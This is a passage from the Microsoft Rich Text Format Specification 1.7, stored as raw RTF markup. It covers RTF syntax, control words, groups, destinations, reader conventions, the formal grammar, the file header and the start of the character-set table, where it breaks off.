The Rich Text Format (RTF) Specification is a method of encoding formatted text and graphics for easy transfer between applications. Currently, users depend on special translation software to move word-processing documents between different MS-DOS}{\fs12
\u174\'a8}{, Microsoft}{\sub \u174\'a8}{ Windows}{\sub \u174\'a8}{, OS/2, Macintosh, and Power Macintosh applications.
\par The RTF Specification provides a format for text and graphics interchange that can be used with different output devices, operating environments, and
operating systems. RTF uses the ANSI, PC-8, Macintosh, or IBM PC character set to control the representation and formatting of a document, both on the screen and in print. With the RTF Specification, documents created under different operating systems and
with different software applications can be transferred between those operating systems and applications. RTF files created in Microsoft Word 6.0 (and later) for the Macintosh and Power Macintosh have a file type of \ldblquote RTF.\rdblquote
\par Software that takes a formatted f
ile and turns it into an RTF file is called an RTF writer. An RTF writer separates the application's control information from the actual text and writes a new file containing the text and the RTF groups associated with that text. Software that translates
an RTF file into a formatted file is called an RTF reader.
\par A sample RTF reader application is available (see }{\field\fldedit{\*\fldinst { HYPERLINK \\l "APPENDIX_A_SAMPLE_RTF_READER" }{{\*\datafield
08d0c9ea79f9bace118c8200aa004ba90b02000000080000001d00000041005000500045004e004400490058005f0041005f00530041004d0050004c0045005f005200540046005f00520045004100440045005200000000}}}{\fldrslt {\cs110\ul\cf2 Appendix A: Sample RTF Reader Application}}}{
). It is designed for use with the specification to assist those interested in developing their own RTF readers. This application and its use are described in }{\field\fldedit{\*\fldinst { HYPERLINK \\l "APPENDIX_A_SAMPLE_RTF_READER" }{{\*\datafield
08d0c9ea79f9bace118c8200aa004ba90b02000000080000001d00000041005000500045004e004400490058005f0041005f00530041004d0050004c0045005f005200540046005f00520045004100440045005200000000}}}{\fldrslt {\cs110\ul\cf2 Appendix A}}}{
. The sample RTF reader is not a for-sale product, and Microsoft does not provide technical or any other type of support for the sample RTF reader code or the RTF specification.
\par RTF version 1.7 includes all new control words introduced by Microsoft Word for Windows 95 version 7.0, Word 97 for Windows, Word 98 for the Macintosh, Word 2000 for Windows, and Word 2002 for Windows}{\cf6 , }{as well as other Microsoft products.
\par }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960795}{\*\bkmkstart _Toc335399069}{\*\bkmkstart _Toc380819766}{\*\bkmkstart _Toc381591817}{\*\bkmkstart _Toc382644178}
{\*\bkmkstart _Toc383176009}{\*\bkmkstart _Toc386002167}{\*\bkmkstart _Toc386539798}{\*\bkmkstart RTF_SYNTAX}{\*\bkmkstart _Toc519492433}{\*\bkmkstart _Toc521909676}RTF Syntax{\*\bkmkend _Toc313960795}{\*\bkmkend _Toc335399069}{\*\bkmkend _Toc380819766}
{\*\bkmkend _Toc381591817}{\*\bkmkend _Toc382644178}{\*\bkmkend _Toc383176009}{\*\bkmkend _Toc386002167}{\*\bkmkend _Toc386539798}{\*\bkmkend RTF_SYNTAX}{\*\bkmkend _Toc519492433}{\*\bkmkend _Toc521909676}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {An RTF file consists of unformatted text, control words, control symbols, and groups. For ease of transport, a standard RTF file can consist of only 7-bit ASCII characters. (Conv
erters that communicate with Microsoft Word for Windows or Microsoft Word for the Macintosh should expect 8-bit characters.) There is no set maximum line length for an RTF file.
\par A }{\i control word}{ is a specially formatted command that RTF uses to mark printer control codes and information that applications use to manage documents. A control word cannot be longer than 32 characters. A control word takes the following form:
\par }\pard\plain \s15\li288\sa120\widctlpar\adjustright \f1\fs20\cgrid {\\LetterSequence}{\i <}{Delimiter}{\i >}{
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {Note that a backslash begins each control word.
\par The LetterSequence is made up of lowercase alphabetic characters (a through z). RTF is case sensitive. Control words (also known as Keywords) may not contain any uppercase alphabetic characters.
\par The following keywords }{\cf1 found in Word 97 through Word 2002}{ do not currently f
ollow the requirement that keywords may not contain any uppercase alphabetic characters. All writers should still follow this rule, and Word will also emit completely lowercase versions of all these keywords in the next version. In the meantime, those imp
lementing readers are advised to treat them as exceptions.
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\ls22\adjustright {\b \\clFitText
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \s21\fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\tx720\tqr\tldot\tx10080\ls22\adjustright \f1\fs20\cgrid {\b \\clftsWidth}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \fi-144\li144\sa120\widctlpar\jclisttab\tx360\ls22\adjustright \f1\fs20\cgrid {\b \\clNoWrap
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\clwWidth}{\b\i N}{
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\ls22\adjustright {\b \\tdfrmtxtBottom}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\tdfrmtxtLeft}{\b\i N
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}{\b \\tdfrmtxtRight}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\tdfrmtxtTop}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \s21\fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\tx720\tqr\tldot\tx10080\ls22\adjustright \f1\fs20\cgrid {\b \\trftsWidthA}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trftsWidthB}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trftsWidth}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trwWidthA}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trwWidthB}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\ls22\adjustright \f1\fs20\cgrid {\b \\trwWidth}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-144\li144\ri-120\sa120\widctlpar\jclisttab\tx360\ls22\adjustright {\b \\sectspecifygenN
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\ApplyBrkRules
\par }\pard \sa120\widctlpar\adjustright {The delimiter marks the end of an RTF control word, and can be one of the following:
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{A space. In this case, the space is part of the control word.
\par }{\f3 \u-3913\'b7\tab }{A digit or a hyphen (-), which indicates that a numeric parameter follows. The subsequent digital sequence is then delimited by a space or any character other than a letter or a digit. The p
arameter can be a positive or negative number. The range of the values for the number is generally \endash 32767 through 32767. However, Word tends to restrict the range to \endash 31680 through 31680. Word allows values in the range \endash
2,147,483,648 to 2,147,483,647 for a small number of keywords (specifically }{\b \\bin}{, }{\b \\revdttm}{
, and some picture properties). An RTF parser must handle an arbitrary string of digits as a legal value for a keyword. If a numeric parameter immediately follows the control word, this parameter becom
es part of the control word. The control word is then delimited by a space or a nonalphabetic or nonnumeric character in the same manner as any other control word.
\par }{\f3 \u-3913\'b7\tab }{Any character other than a letter or a digit. In this case, the delimiting character terminates the control word but is not actually part of the control word.
\par }\pard \sa120\widctlpar\adjustright {If a space delimits the control word, the space does not appear in the document. Any characters following the delimiter, including spaces, will appear in the document. For this reason, yo
u should use spaces only where necessary; do not use spaces merely to break up RTF code.
\par A }{\i control symbol}{ consists of a backslash followed by a single, nonalphabetic character. For example, }{\b \\~}{ represents a nonbreaking space. Control symbols take no delimiters.
\par A }{\i group}{ consists of text and control words or control symbols enclosed in braces (\{}{\expnd-4\expndtw-20 }{\}). The opening brace (\{}{\expnd-4\expndtw-20 }{) indicates the start of the group and the closing brace (}{\expnd-4\expndtw-20 }{\}
) indicates the end of the group. Each group specifies the text affected by the gr
oup and the different attributes of that text. The RTF file can also include groups for fonts, styles, screen color, pictures, footnotes, comments (annotations), headers and footers, summary information, fields, and bookmarks, as well as document-, sectio
n
-, paragraph-, and character-formatting properties. If the font, file, style, screen color, revision mark, and summary-information groups and document-formatting properties are included, they must precede the first plain-text character in the document. Th
ese groups form the RTF file header. If the group for fonts is included, it should precede the group for styles. If any group is not used, it can be omitted. The groups are discussed in the following sections.
\par The control properties of certain control words
(such as bold, italic, keep together, and so on) have only two states. When such a control word has no parameter or has a nonzero parameter, it is assumed that the control word turns on the property. When such a control word has a parameter of 0, it is a
ssumed that the control word turns off the property. For example, }{\b \\b}{ turns on bold, whereas }{\b \\b0}{ turns off bold.
\par Certain control words, referred to as }{\i destinations}{, mark the beginning of a collection of related text that could appear at another position, or
destination, within the document. Destinations may also be text that is used but should not appear within the document at all. An example of a destination is the \\
footnote group, where the footnote text follows the control word. Page breaks cannot occur in
destination text. Destination control words and their following text must be enclosed in braces. No other control words or text may appear within the destination group. Destinations added after the RTF Specification published in the March 1987 }{\i
Microsoft Systems Journal}{ may be preceded by the control symbol }{\b \\*}{
. This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination. (RTF writers should follow the convention of using this control
symbol when adding new destinations or groups.) Destinations whose related text should be inserted into the document even if the RTF reader does not recognize the destination should not use }{\b \\*}{
. All destinations that were not included in the March 1987 revision of the RTF Specification are shown with }{\b \\*}{ as part of the control word.
\par Formatting specified within a group affects only the text within that group. Generally, text within a group inherits the formatting of the text in the preceding group. However, Mi
crosoft implementations of RTF assume that the footnote, annotation, header, and footer groups (described later in this specification) do not inherit the formatting of the preceding text. Therefore, to ensure that these groups are always formatted correct
ly, you should set the formatting within these groups to the default with the }{\b \\sectd, \\pard, }{and }{\b \\plain }{control words, and then add any desired formatting.
\par The control words, control symbols, and braces constitute control information. All other characters in the file are plain text. Here is an example of plain text that does not exist within a group:
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\rtf\\ansi\\deff0\{\\fonttbl\{\\f0\\froman Tms Rmn;\}\{\\f1\\fdecor
\par Symbol;\}\{\\f2\\fswiss Helv;\}\}\{\\colortbl;\\red0\\green0\\blue0;
\par \\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\
\par blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\
\par green255\\blue0;\\red255\\green255\\blue255;\}\{\\stylesheet\{\\fs20 \\snext0Normal;\}\}\{\\info\{\\author John Doe\}
\par \{\\creatim\\yr1990\\mo7\\dy30\\hr10\\min48\}\{\\version1\}\{\\edmins0\}
\par \{\\nofpages1\}\{\\nofwords0\}\{\\nofchars0\}\{\\vern8351\}\}\\widowctrl\\ftnbj \\sectd\\linex0\\endnhere \\pard\\plain \\fs20 This is plain text.\\par\}
\par
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The phrase \ldblquote This is plain text.\rdblquote is not part of a group and is treated as document text.
\par As previously mentioned, the backslash (\\) and braces (\{}{\expnd-4\expndtw-20 }{\}) have special meaning in RTF. To use these characters as text, precede them with a backslash, as in \\\\, \\\{, and \\\}.
\par }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960796}{\*\bkmkstart _Toc335399070}{\*\bkmkstart _Toc380819767}{\*\bkmkstart _Toc381591818}{\*\bkmkstart _Toc382644179}
{\*\bkmkstart _Toc383176010}{\*\bkmkstart _Toc386002168}{\*\bkmkstart _Toc386539799}{\*\bkmkstart CONVENTIONS_OF_AN_RTF_READER}{\*\bkmkstart _Toc519492434}{\*\bkmkstart _Toc521909677}Conventions of an RTF Reader{\*\bkmkend _Toc313960796}
{\*\bkmkend _Toc335399070}{\*\bkmkend _Toc380819767}{\*\bkmkend _Toc381591818}{\*\bkmkend _Toc382644179}{\*\bkmkend _Toc383176010}{\*\bkmkend _Toc386002168}{\*\bkmkend _Toc386539799}{\*\bkmkend CONVENTIONS_OF_AN_RTF_READER}{\*\bkmkend _Toc519492434}
{\*\bkmkend _Toc521909677}
\par }\pard\plain \sa120\keepn\widctlpar\adjustright \f1\fs20\cgrid {The reader of an RTF stream is concerned with the following:
\par }\pard \fi-360\li360\sa120\keepn\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{Separating control information from plain text.
\par }{\f3 \u-3913\'b7\tab }{Acting on control information.
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{Collecting and properly inserting text into the document, as directed by the current group state.
\par }\pard \sa120\widctlpar\adjustright {Acting on control information is designed to be a relatively simple process. Some control information simply contributes special characters to the plain text stream. Other information serves to change the }{\i
program state}{, which includes properties of the document as a whole, or to change any of a collection of }{\i group states}{, which apply to parts of the document.
\par As previously mentioned, a group state can specify the following:
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{The }{\i destination}{, or part of the document that the plain text is constructing.
\par }{\f3 \u-3913\'b7\tab }{Character-formatting properties, such as bold or italic.
\par }{\f3 \u-3913\'b7\tab }{Paragraph-formatting properties, such as justified or centered.
\par }{\f3 \u-3913\'b7\tab }{Section-formatting properties, such as the number of columns.
\par }{\f3 \u-3913\'b7\tab }{Table-formatting properties, which define the number of cells and dimensions of a table row.
\par }\pard \sa120\widctlpar\adjustright {In practice, an RTF reader will evaluate each character it reads in sequence as follows:
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{If the character is an opening brace (\{), the reader stores its current state on the stack. If the character is a closing brace (\}
), the reader retrieves the current state from the stack.
\par }{\f3 \u-3913\'b7\tab }{If the character is a backslash (\\), the reader collects the control word or control symbol and its parameter, if any, and
looks up the control word or control symbol in a table that maps control words to actions. It then carries out the action prescribed in the lookup table. (The possible actions are discussed in the following table.) The read pointer is left before or after
a control-word delimiter, as appropriate.
\par }{\f3 \u-3913\'b7\tab }{If the character is anything other than an opening brace (\{), closing brace (\}), or backslash (\\
), the reader assumes that the character is plain text and writes the character to the current destination using the current formatting properties.
\par }\pard \sa120\widctlpar\adjustright {If the RTF
reader cannot find a particular control word or control symbol in the lookup table described in the preceding list, the control word or control symbol should be ignored. If a control word or control symbol is preceded by an opening brace (\{
), it is part of a group. The current state should be saved on the stack, but no state change should occur. When a closing brace (\}) is encountered, the current state should be retrieved from the stack, thereby resetting the current state. If the }{\b \\
* }{control symbol precedes a control word, then it defines a destination group and was itself preceded by an opening brace (\{). The RTF reader should discard all text up to and including the closing brace (\}
) that closes this group. All RTF readers must recognize all destinations
defined in the March 1987 RTF Specification. The reader may skip past the group, but it is not allowed to simply discard the control word. Destinations defined since March 1987 are marked with the }{\b \\*}{ control symbol.
\par }\pard\plain \s65\li432\sa120\widctlpar\adjustright \i\f1\fs20\cgrid {\b Note}{ All RTF readers must implement the }{\b \\*}{ control symbol so that they can read RTF files written by newer RTF writers.
\par }\pard\plain \sa120\keepn\widctlpar\adjustright \f1\fs20\cgrid {For control words or control symbols that the RTF reader can find in the lookup table, the possible actions are as follows.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx3330\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10152\pard \sa120\keepn\widctlpar\intbl\adjustright {\b Action\cell Description\cell }\pard \widctlpar\intbl\adjustright
{\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx3330\clvertalt\cltxlrtb \cellx10152\pard \sb120\sa120\widctlpar\intbl\adjustright {Change Destination\cell The RTF read
er changes the destination to the destination described in the table entry. Destination changes are legal only immediately after an opening brace (\{}{\expnd-4\expndtw-20 }{
). (Other restrictions may also apply; for example, footnotes cannot be nested.) Many destination changes imply that the current property settings will be reset to their default settings. Examples of control words that change destination are }{\b \\
footnote}{, }{\b \\header}{, }{\b \\footer}{, }{\b \\pict}{, }{\b \\info}{, }{\b \\fonttbl}{, }{\b \\stylesheet}{, and }{\b \\colortbl}{. This specification identifies all destination control words where they appear in control-word tables.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {Change Formatting Property\cell The RTF reader changes the property as described in the table entry. The entry will specify whether a parameter is required. }
{\field\fldedit{\*\fldinst { HYPERLINK \\l "APPENDIX_B_INDEX_OF_RTF_CONTROL_WORDS" }{{\*\datafield
08d0c9ea79f9bace118c8200aa004ba90b02000000080000002600000041005000500045004e004400490058005f0042005f0049004e004400450058005f004f0046005f005200540046005f0043004f004e00540052004f004c005f0057004f00520044005300000000}}}{\fldrslt {\cs110\ul\cf2
Appendix B: Index of RTF Control Words}}}{ at the end of this Specification also specifies which control words require parameters. If a parameter is needed and not specified, then a default value will be used. The default value used depends o
n the control word. If the control word does not specify a default, then all RTF readers should assume a default of 0.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {Insert Special Character\cell
The reader inserts into the document the character code or codes described in the table entry.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx3330\clvertalt\cltxlrtb \cellx10152\pard
\sa120\widctlpar\intbl\adjustright {Insert Special Character and Perform Action\cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {
The reader inserts into the document the character code or codes described in the table entry and performs whatever other action the entry specifies. For example, when Microsoft Word interprets }{\b \\par}{, a paragraph mark is inserte
d in the document and special code is run to record the paragraph properties belonging to that paragraph mark.\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright
\b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960797}{\*\bkmkstart _Toc335399071}{\*\bkmkstart _Toc380819768}{\*\bkmkstart _Toc381591819}{\*\bkmkstart _Toc382644180}{\*\bkmkstart _Toc383176011}{\*\bkmkstart _Toc386002169}{\*\bkmkstart _Toc386539800}
{\*\bkmkstart FORMAL_SYNTAX}{\*\bkmkstart _Toc519492435}{\*\bkmkstart _Toc521909678}Formal Syntax{\*\bkmkend _Toc313960797}{\*\bkmkend _Toc335399071}{\*\bkmkend _Toc380819768}{\*\bkmkend _Toc381591819}{\*\bkmkend _Toc382644180}{\*\bkmkend _Toc383176011}
{\*\bkmkend _Toc386002169}{\*\bkmkend _Toc386539800}{\*\bkmkend FORMAL_SYNTAX}{\*\bkmkend _Toc519492435}{\*\bkmkend _Toc521909678}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {RTF uses the following syntax, based on Backus-Naur Form.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Syntax\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\clbrdrt
\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrt\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {#PCDATA\cell Text (without control words).\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep
\clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\lang3082 #SDATA\cell Hexadecimal data.\cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard\plain \s21\sa120\widctlpar\intbl\adjustright
\f1\fs20\cgrid {#BDATA\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {Binary data.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {'c'\cell A literal.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<text>\cell A nonterminal.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\a}{\cell
The (terminal) control word a, without a parameter. \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b\i \\a }{or }{\b \\a}{\b\i N}{\cell The (terminal) control word a, with a parameter.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {a?\cell Item a is optional.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {a+\cell One or more repetitions of item a.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {a*\cell Zero or more repetitions of item a.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {a b\cell Item a followed by item b.\cell
}\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {a | b\cell Item a or item b.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard
\sa120\widctlpar\intbl\adjustright {a & b\cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {Item a and/or item b, in any order.\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain
\s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960798}{\*\bkmkstart _Toc335399072}{\*\bkmkstart _Toc380819769}{\*\bkmkstart _Toc381591820}{\*\bkmkstart _Toc382644181}{\*\bkmkstart _Toc383176012}
{\*\bkmkstart _Toc386002170}{\*\bkmkstart _Toc386539801}{\*\bkmkstart CONTENTS_OF_AN_RTF_FILE}{\*\bkmkstart _Toc519492436}{\*\bkmkstart _Toc521909679}Contents of an RTF File{\*\bkmkend _Toc313960798}{\*\bkmkend _Toc335399072}{\*\bkmkend _Toc380819769}
{\*\bkmkend _Toc381591820}{\*\bkmkend _Toc382644181}{\*\bkmkend _Toc383176012}{\*\bkmkend _Toc386002170}{\*\bkmkend _Toc386539801}{\*\bkmkend CONTENTS_OF_AN_RTF_FILE}{\*\bkmkend _Toc519492436}{\*\bkmkend _Toc521909679}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {An RTF file has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<File>\cell }{\lang1036 '\{' <header> <document> '\}'\cell }\pard \widctlpar\intbl\adjustright {\lang1036 \row }\pard
\sa120\widctlpar\adjustright {\lang1036
\par }{This syntax is the standard
RTF syntax; any RTF reader must be able to correctly interpret RTF written to this syntax. It is worth mentioning again that RTF readers do not have to use all control words, but they must be able to harmlessly ignore unknown (or unused) control words, a
nd they must correctly skip over destinations marked with the }{\b \\*}{
control symbol. There may, however, be RTF writers that generate RTF that does not conform to this syntax, and as such, RTF readers should be robust enough to handle some minor variations. Non
etheless, if an RTF writer generates RTF conforming to this specification, then any correct RTF reader should be able to interpret it.
\par }\pard\plain \s2\sb240\sa240\keepn\widctlpar\outlinelevel1\adjustright \b\f1\fs32\cgrid {{\*\bkmkstart _Toc313960799}{\*\bkmkstart _Toc335399073}{\*\bkmkstart _Toc380819770}{\*\bkmkstart _Toc381591821}{\*\bkmkstart _Toc382644182}
{\*\bkmkstart _Toc383176013}{\*\bkmkstart _Toc386002171}{\*\bkmkstart _Toc386539802}{\*\bkmkstart Header}{\*\bkmkstart _Toc519492437}{\*\bkmkstart _Toc521909680}Header{\*\bkmkend _Toc313960799}{\*\bkmkend _Toc335399073}{\*\bkmkend _Toc380819770}
{\*\bkmkend _Toc381591821}{\*\bkmkend _Toc382644182}{\*\bkmkend _Toc383176013}{\*\bkmkend _Toc386002171}{\*\bkmkend _Toc386539802}{\*\bkmkend Header}{\*\bkmkend _Toc519492437}{\*\bkmkend _Toc521909680}
\par }\pard\plain \sa120\keepn\widctlpar\adjustright \f1\fs20\cgrid {The header has the following syntax:
\par }\pard \sa120\widctlpar\intbl\adjustright {<header>\cell }{\b\i \\rtf}{ <charset> }{\b\i \\deff}{? <fonttbl> <filetbl>? <colortbl>? <stylesheet>? <listtables>? <revtbl>? <rsidtbl>? <generator>?\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\adjustright {{\*\bkmkstart _Ref281719559}{\*\bkmkstart _Toc313960800}{\*\bkmkstart _Toc335399074}
\par Each of the various header tables should appear, if they exist, in this order. Document properties can occur before and between the header tables. A property must be defined before being referenced. Specifically,
\par {\pntext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-360\li720\sa120\widctlpar\tx720{\*\pn \pnlvlblt\ilvl0\ls2\pnrnot0\pnf3\pnstart1\pnindent360\pnhang{\pntxtb \'b7}}\ls2\adjustright {
The style sheet must occur before any style usage.
\par {\pntext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-360\li720\sa120\widctlpar\tx720{\*\pn \pnlvlblt\ilvl0\ls2\pnrnot0\pnf3\pnstart1\pnindent360\pnhang{\pntxtb \'b7}}\ls2\adjustright {
The font table must precede any reference to a font.
\par {\pntext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-360\li720\sa120\widctlpar\tx720{\*\pn \pnlvlblt\ilvl0\ls2\pnrnot0\pnf3\pnstart1\pnindent360\pnhang{\pntxtb \'b7}}\ls2\adjustright {The }{\b \\deff}{
keyword must precede any text without an explicit reference to a font, because it specifies the font to use in such cases.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc380819771}{\*\bkmkstart _Toc381591822}{\*\bkmkstart _Toc382644183}{\*\bkmkstart _Toc383176014}{\*\bkmkstart _Toc386002172}
{\*\bkmkstart _Toc386539803}{\*\bkmkstart RTF_Version}{\*\bkmkstart _Toc519492438}{\*\bkmkstart _Toc521909681}RTF Version{\*\bkmkend _Ref281719559}{\*\bkmkend _Toc313960800}{\*\bkmkend _Toc335399074}{\*\bkmkend _Toc380819771}{\*\bkmkend _Toc381591822}
{\*\bkmkend _Toc382644183}{\*\bkmkend _Toc383176014}{\*\bkmkend _Toc386002172}{\*\bkmkend _Toc386539803}{\*\bkmkend RTF_Version}{\*\bkmkend _Toc519492438}{\*\bkmkend _Toc521909681}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {An entire RTF file is considered a group and must be enclosed in braces. The }{\b \\rtf}{\b\i N}{ control word must follow the opening brace. The numeric parameter }{\b\i N}{
identifies the major version of the RTF Specification used. The RTF standard described in this specification, although titled as version 1.7, continues to correspond syntactically to RTF Specification version 1. Therefore, the numeric parameter }{\b\i N}
{ for the }{\b \\rtf}{ control word should still be emitted as 1.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc313960801}{\*\bkmkstart _Toc335399075}{\*\bkmkstart _Toc380819772}{\*\bkmkstart _Toc381591823}{\*\bkmkstart _Toc382644184}
{\*\bkmkstart _Toc383176015}{\*\bkmkstart _Toc386002173}{\*\bkmkstart _Toc386539804}{\*\bkmkstart Character_Set}{\*\bkmkstart _Toc519492439}{\*\bkmkstart _Toc521909682}Character Set{\*\bkmkend _Toc313960801}{\*\bkmkend _Toc335399075}
{\*\bkmkend _Toc380819772}{\*\bkmkend _Toc381591823}{\*\bkmkend _Toc382644184}{\*\bkmkend _Toc383176015}{\*\bkmkend _Toc386002173}{\*\bkmkend _Toc386539804}{\*\bkmkend Character_Set}{\*\bkmkend _Toc519492439}{\*\bkmkend _Toc521909682}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {After specifying the RTF versio
n, you must declare the character set used in this document. The control word for the character set must precede any plain text or any table control words. The RTF Specification currently supports the following character sets.
\par
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Character set\cell }\pard
\widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\ansi\cell }{ANSI (the default)\cell }\pard \widctlpar\intbl\adjustright {
